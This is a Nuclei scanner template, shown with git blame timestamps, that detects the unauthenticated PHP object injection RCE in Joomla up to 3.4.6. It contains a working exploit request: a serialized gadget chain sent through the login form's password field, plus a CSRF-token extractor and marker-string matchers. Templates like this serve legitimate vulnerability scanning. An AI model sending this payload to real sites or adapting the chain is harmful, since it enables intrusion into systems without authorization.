2022-01-20 08:39:19 +00:00
|
|
|
id: rusty-joomla
|
|
|
|
|
|
|
|
info:
|
2022-06-09 20:35:21 +00:00
|
|
|
name: Joomla! CMS <=3.4.6 - Remote Code Execution
|
2022-01-21 07:09:28 +00:00
|
|
|
author: leovalcante,kiks7
|
2022-01-20 08:39:19 +00:00
|
|
|
severity: critical
|
2022-05-31 09:04:37 +00:00
|
|
|
description: |
|
2022-06-09 20:35:21 +00:00
|
|
|
Joomla! CMS 3.0.0 through the 3.4.6 release contains an unauthenticated PHP object injection that leads to remote code execution.
|
2022-01-20 08:39:19 +00:00
|
|
|
reference:
|
|
|
|
- https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/
|
|
|
|
- https://github.com/kiks7/rusty_joomla_rce
|
2022-05-26 18:11:38 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-77
|
2022-02-01 20:30:09 +00:00
|
|
|
tags: joomla,rce,unauth,php,cms,objectinjection
|
2022-01-20 08:39:19 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2022-02-01 20:30:09 +00:00
|
|
|
username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1
|
2022-01-20 08:39:19 +00:00
|
|
|
|
2022-10-07 21:27:25 +00:00
|
|
|
host-redirects: true
|
2022-02-01 20:30:09 +00:00
|
|
|
max-redirects: 2
|
2022-01-20 08:39:19 +00:00
|
|
|
cookie-reuse: true
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: csrf
|
|
|
|
part: body
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- "<input type=\"hidden\" name=\"([0-9a-z]{32})\" value=\"1\""
|
2022-05-31 08:39:58 +00:00
|
|
|
internal: true
|
2022-01-20 08:39:19 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-05-31 08:39:58 +00:00
|
|
|
part: body
|
2022-01-20 08:39:19 +00:00
|
|
|
words:
|
2022-02-01 20:30:09 +00:00
|
|
|
- "http://rusty.jooml/;pkwxhxqxmdkkmscotwvh"
|
|
|
|
- "Failed to decode session object"
|
|
|
|
condition: and
|
2022-05-26 18:11:38 +00:00
|
|
|
|
2022-05-27 13:40:04 +00:00
|
|
|
# Enhanced by mp on 2022/05/27
|